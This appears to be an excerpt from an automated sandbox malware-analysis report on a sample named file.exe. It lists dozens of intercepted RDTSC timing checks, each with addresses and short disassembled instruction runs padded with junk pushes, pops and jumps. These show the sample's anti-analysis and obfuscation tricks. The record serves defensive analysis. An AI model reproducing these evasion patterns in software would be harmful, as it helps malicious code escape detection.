                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5792 second address: EB579F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F47DCFB8A3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB579F second address: EB57AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F47DD40FB76h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5910 second address: EB591A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB591A second address: EB591E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A4A second address: EB5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F47DCFB8A36h 0x0000000d jmp 00007F47DCFB8A48h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A6F second address: EB5A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5A73 second address: EB5A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5BCE second address: EB5BDA instructions: 0x00000000 rdtsc 0x00000002 je 00007F47DD40FB76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5BDA second address: EB5BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB5D41 second address: EB5D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB7Eh 0x00000007 jmp 00007F47DD40FB7Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F47DD40FB76h 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB601C second address: EB6022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB6022 second address: EB6027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADC2 second address: EBADDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47DCFB8A45h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADDF second address: EBADE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADE3 second address: EBADE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBADE9 second address: EBAE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F47DD40FBA5h 0x0000000d pushad 0x0000000e jp 00007F47DD40FB76h 0x00000014 jp 00007F47DD40FB76h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBAE08 second address: EBAE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC27DA second address: EC27E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC27E2 second address: EC280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47DCFB8A48h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d jg 00007F47DCFB8A36h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC280E second address: EC2814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2814 second address: EC281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC281C second address: EC2833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F47DD40FB7Eh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2ACD second address: EC2ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2ADE second address: EC2AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2AE4 second address: EC2AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC2AED second address: EC2AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC34ED second address: EC34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F47DCFB8A36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC34FC second address: EC3530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F47DD40FB87h 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F47DD40FB76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47DD40FB7Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0B7 second address: DFA0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0C0 second address: DFA0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0C4 second address: DFA0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F47DCFB8A38h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0D8 second address: DFA0F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DD40FB84h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA0F0 second address: DFA110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F47DCFB8A44h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA110 second address: DFA115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC9B2F second address: EC9B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC9B33 second address: EC9B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDB909 second address: EDB946 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47DCFB8A3Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F47DCFB8A42h 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47DCFB8A41h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBAB3 second address: EDBABF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47DD40FB76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBABF second address: EDBAFD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A3Eh 0x00000008 push edx 0x00000009 jmp 00007F47DCFB8A3Fh 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47DCFB8A40h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBAFD second address: EDBB0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDBB0D second address: EDBB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD774 second address: EDD787 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47DD40FB76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F47DD40FB76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD787 second address: EDD79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DCFB8A40h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98F9 second address: EE98FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98FF second address: EE9905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9905 second address: EE991A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F47DD40FB7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE991A second address: EE9920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9785 second address: EE979E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47DD40FB84h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC56C second address: EEC570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC570 second address: EEC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B55 second address: EF3B65 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47DCFB8A36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B65 second address: EF3B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B69 second address: EF3B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B6D second address: EF3B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B75 second address: EF3B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF3B7B second address: EF3BC3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47DD40FB76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F47DD40FB7Eh 0x00000015 pop ecx 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F47DD40FB86h 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007F47DD40FB7Bh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF250A second address: EF2510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2510 second address: EF2514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF264E second address: EF2652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2652 second address: EF266C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DD40FB84h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2821 second address: EF2842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F47DCFB8A47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2842 second address: EF284C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47DD40FB76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF284C second address: EF2864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2864 second address: EF286A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF286A second address: EF2887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F47DCFB8A36h 0x0000000b jmp 00007F47DCFB8A3Ch 0x00000010 popad 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF29B7 second address: EF29D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F47DD40FB76h 0x0000000a pop edx 0x0000000b jmp 00007F47DD40FB7Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2C71 second address: EF2CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47DCFB8A43h 0x00000007 jmp 00007F47DCFB8A43h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F47DCFB8A41h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2E19 second address: EF2E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF38AE second address: EF38B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050CC second address: F050D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050D2 second address: F050D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050D6 second address: F050DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050DC second address: F050E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050E8 second address: F050EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F050EC second address: F050F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04F8E second address: F04F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04F92 second address: F04FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F068F5 second address: F068FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F068FB second address: F06917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F47DCFB8A41h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0674D second address: F06777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47DD40FB7Fh 0x00000009 popad 0x0000000a jmp 00007F47DD40FB80h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F06777 second address: F0677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14244 second address: F1427C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47DD40FB76h 0x00000008 jmp 00007F47DD40FB80h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007F47DD40FB8Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E028E8 second address: E028EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F15DD8 second address: F15DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F15DDC second address: F15DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47DCFB8A3Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BB7 second address: F24BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BBD second address: F24BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jo 00007F47DCFB8A3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24BCD second address: F24BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24E69 second address: F24E7F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47DCFB8A36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007F47DCFB8A36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24E7F second address: F24E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25586 second address: F255A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F47DCFB8A36h 0x0000000a popad 0x0000000b jns 00007F47DCFB8A42h 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F255A8 second address: F255B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F47DD40FB76h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2570A second address: F2572A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F47DCFB8A4Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2707B second address: F2707F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2707F second address: F27088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27088 second address: F27095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F27095 second address: F270A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F47DCFB8A36h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
